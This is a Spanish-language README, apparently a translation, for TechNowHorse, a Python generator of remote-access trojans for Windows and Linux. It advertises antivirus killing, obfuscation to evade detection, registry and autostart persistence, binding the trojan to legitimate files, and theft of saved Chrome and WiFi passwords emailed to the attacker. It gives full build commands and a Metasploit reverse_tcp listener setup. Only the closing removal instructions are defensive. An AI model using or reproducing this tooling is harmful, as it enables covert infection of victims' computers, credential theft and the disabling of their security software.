TechNowHorse es un generador de RAT (Remote Administrator Trojan) para sistemas Windows/Linux escrito en Python 3.
ESTE SOFTWARE SE PROPORCIONA “TAL CUAL” SIN GARANTÍA DE NINGÚN TIPO. PUEDES USAR ESTE SOFTWARE BAJO TU PROPIO RIESGO. EL USO ES RESPONSABILIDAD COMPLETA DEL USUARIO FINAL. LOS DESARROLLADORES NO ASUMEN NINGUNA RESPONSABILIDAD Y NO SON RESPONSABLES DE NINGÚN MAL USO O DAÑO CAUSADO POR ESTE PROGRAMA.
Características
- Funciona en Windows/Linux
- Notificar a la nueva víctima por correo electrónico
- Indetectable
- No requiere privilegios de root o de administrador
- Persistencia
- Envía una captura de pantalla de la pantalla del PC de la víctima por correo electrónico
- Darle acceso total al atacante a Meterpreter
- Nunca requirió la instalación de metesploit para crear un troyano.
- Crea un binario ejecutable con cero dependencias
- Crear menos tamaño ~ 5mb de carga útil con la funcionalidad avanzada
- Ofuscar la carga útil antes de compilarla, por lo tanto, eludir unos cuantos antivirus más
- La carga útil generada está encriptada con base64, por lo que es extremadamente difícil hacer ingeniería inversa de la carga útil
- Funciona para matar el antivirus en el PC de la víctima e intenta desactivar el Centro de Seguridad
- Impresionante interfaz colorida para generar la carga útil
- En el lado del atacante: Mientras crea la carga útil, el script detecta automáticamente las dependencias que faltan y las instala.
- Capaz de añadir un icono personalizado al archivo malo.
- Carpeta incorporada que puedes vincular el Keylogger a cualquier archivo [.pdf, .txt, .exe etc.], ejecutando el archivo legítimo en la parte front end y los códigos malignos en la parte back-end como un servicio.
- Comprueba si la instancia ya está funcionando en el sistema, si se encuentra una instancia en funcionamiento, entonces sólo se ejecuta el archivo legítimo .
- El atacante puede crear/compilar para ambos sistemas operativos Windows/Linux usando el sistema Linux, pero sólo puede crear/compilar el ejecutable Windows usando la máquina Windows.
- Recupera las contraseñas guardadas del sistema de la víctima y las envía al atacante.
| Supported Retrives, intenta recuperar las contraseñas guardadas de: |
|---|
| Navegador Chrome |
| WiFi |
A continuación se presentan las limitaciones de la carga útil del meterpreter generada usando el metasploit:
- Hay que ejecutar el Metasploit Listener antes de ejecutar la puerta trasera
- La puerta trasera en sí no se convierte en persistencia, tenemos que usar los módulos de post-explotación para hacer la persistencia de la puerta trasera. Y los módulos de post-explotación sólo pueden ser utilizados después de una explotación exitosa.
- No nos notificaron cuando la carga útil se ejecutó en el nuevo sistema.
- Todos sabemos lo potente que es la carga útil de Meterpeter, pero aún así la carga útil que se hace de ella no es satisfactoria.
Las siguientes son las características de este generador de carga útil que te darán una buena idea de este script python:
- Utiliza el registro de Windows para convertirse en persistencia en Windows.
- También se las arregla para convertirse en persistencia en el sistema de Linux.
- La carga útil puede funcionar tanto en LINUX como en WINDOWS.
- Proporciona acceso completo, ya que el listener metaploit puede ser usado así como soporta listener personalizado (Puedes crear tu propio listener)
- Envía una notificación por correo electrónico, cuando la carga útil se ejecuta en un nuevo sistema, con información completa del sistema.
- Genera la carga útil en un minuto o menos.
- Soporta todos los módulos de post-explotación de meterpreter.
- La carga útil puede ser creada tanto en un sistema Windows como en un sistema Linux.
Requisitos
- Python 3.X
- Pocos módulos externos
En Windows, por favor, especifica/configura la ruta del Pyinstaller en paygen.py [Línea 14]
La ruta por defecto es: PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
Cámbialo de acuerdo a tu sistema
Cómo Usar en Linux
#Instalar dependencias
$ Install latest python 3.x
#Navega al directorio /opt (opcional)
$ cd /opt/
#Clonar este repositorio
$ git clone https://github.com/PushpenderIndia/technowhorse.git
#Entra en el repositorio
$ cd technowhorse
#Instalando dependencias
$ bash installer_linux.sh
#Si obtiene algún error al ejecutar installer_linux.sh, intente instalar usando installer_linux.py
$ python3 installer_linux.py
$ chmod +x paygen.py
$ python3 paygen.py --help
#Haciendo la carga útil/RAT
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path
#Haciendo Payload/RAT con Custom AVKiller [Por defecto, Toneladas de AntiVirus conocidos se añaden en Kill_Targets]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
#Haciendo Payload/RAT con Custom Time para convertirse en persistencia
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10
#Nota: También puedes usar nuestros iconos personalizados de la carpeta de icon, sólo tienes que usarlos así --icon icon/pdf.icoCómo Usar en Windows
#Instalar dependencias
$ Install latest python 3.x
#Clonar este repositorio
$ git clone https://github.com/PushpenderIndia/technowhorse.git
#Entra en el repositorio
$ cd technowhorse
#Instalando dependencias
$ python -m pip install -r requirements.txt
#Abre paygen.py en el editor de texto y configura la línea 14, establece la ruta del Pyinstaller, la ruta por defecto es la siguiente :-
PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
#Menú de ayuda
$ python paygen.py --help
#Haciendo la carga útil/RAT
$ python paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -w -o output_file_name --icon icon_path
#Haciendo Payload/RAT con Custom AVKiller [Por defecto, Toneladas de AntiVirus conocidos se añaden en Kill_Targets]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe
#Haciendo que Payload/RAT se vincule con un archivo legítimo [Cualquier archivo .exe, .pdf, .txt etc]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon/txt.ico --bind passwords.txt
#Nota: También puedes usar nuestros iconos personalizados de la carpeta de icon, sólo tienes que usarlos así --icon icon/pdf.icoEstableciendo Conexión
- Configuración recomendada, puedes intentar probarlo con cualquier otra carga útil en la línea 2
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.43.221
msf3> set LPORT 443
msf3> runArgumentos Disponibles
- Argumentos opcionales
| Corto | Completo | Descripción |
|---|---|---|
| -h | –help | mostrar este mensaje de ayuda y salir |
| -k KILL_AV | –kill_av KILL_AV | AntivirusKiller: Especificar AV’s .exe que deben ser matados. Ex:- –kill_av cmd.exe |
| -t TIME_IN_SECONDS | –persistence TIME_PERSISTENT | Convertirse en persistencia después de __ segundos. default=10 |
| -w | –windows | Generar un ejecutable de Windows. |
| -l | –linux | Generar un ejecutable de Linux. |
| -b file.txt | –bind LEGITIMATE_FILE_PATH.pdf | AutoBinder : Especifica la ruta del archivo legítimo. |
| -s | –steal-password | Robar la contraseña guardada de la máquina de la víctima |
- Argumentos obligatorios
| Corto | Completo | Descripción |
|---|---|---|
| –icon ICON | Especifica la ruta del icono, el icono del archivo malo | |
| –ip IP_ADDRESS | Dirección de correo electrónico a la que enviar los informes. | |
| –port PORT | Puerto de la dirección IP dada en el argumento –ip. | |
| -e EMAIL | –email EMAIL | Dirección de correo electrónico a la que enviar los informes. |
| -p PASSWORD | –password PASSWORD | Contraseña para la dirección de correo electrónico dada en el argumento -e. |
| -o OUT | –out OUT | Nombre del archivo de salida. |
Capturas de Pantalla
Generando payload
Cuando la RAT se ejecuta, añade el Registro para convertirse en persistente
Obtener notificación de la víctima PC
Eliminar TechNowHorse en Windows
Método 1:
- Ir al inicio, escribir regedit y ejecutar el primer programa, esto abrirá el editor del registro.
- Navegar a la siguiente ruta
Computer\HKEY_CURRENT_USER\NSoftware\Microsoft\Windows\CurrentVersion\Run- Debería haber una entrada llamada winexplorer, haz clic con el botón derecho en esta entrada y selecciona Eliminar.
- Ve a tu ruta de usuario > AppData > Roaming, verás un archivo llamado “explorer.exe“, esta es la RAT, haz clic con el botón derecho del ratón > Eliminar.
- Reiniciar el sistema.
Método 2:
- Ejecuta “RemoveTechnowHorse.bat” en el sistema infectado y luego reinicia la PC para detener la actual ejecución del archivo malvado.
Eliminar TechNowHorse en Linux
- Abrir el archivo Autostart con cualquier editor de texto, Ruta de archivo Autostart:
~/.config/autostart/xinput.desktop- Quita estas 5 líneas:
[Desktop Entry]
Type=Application
X-GNOME-Autostart-enabled=true
Name=Xinput
Exec="destination_file_name"- Nota: destination_file_name es el nombre del archivo_maligno que le diste a tu Caballo de Troya usando el parámetro -o
- Reinicia tu sistema y luego borra el archivo maligno almacenado en esta ruta.
- Ruta de destino, donde se almacena el Caballo de Troya : ~/.config/xnput
https://github.com/PushpenderIndia/thorse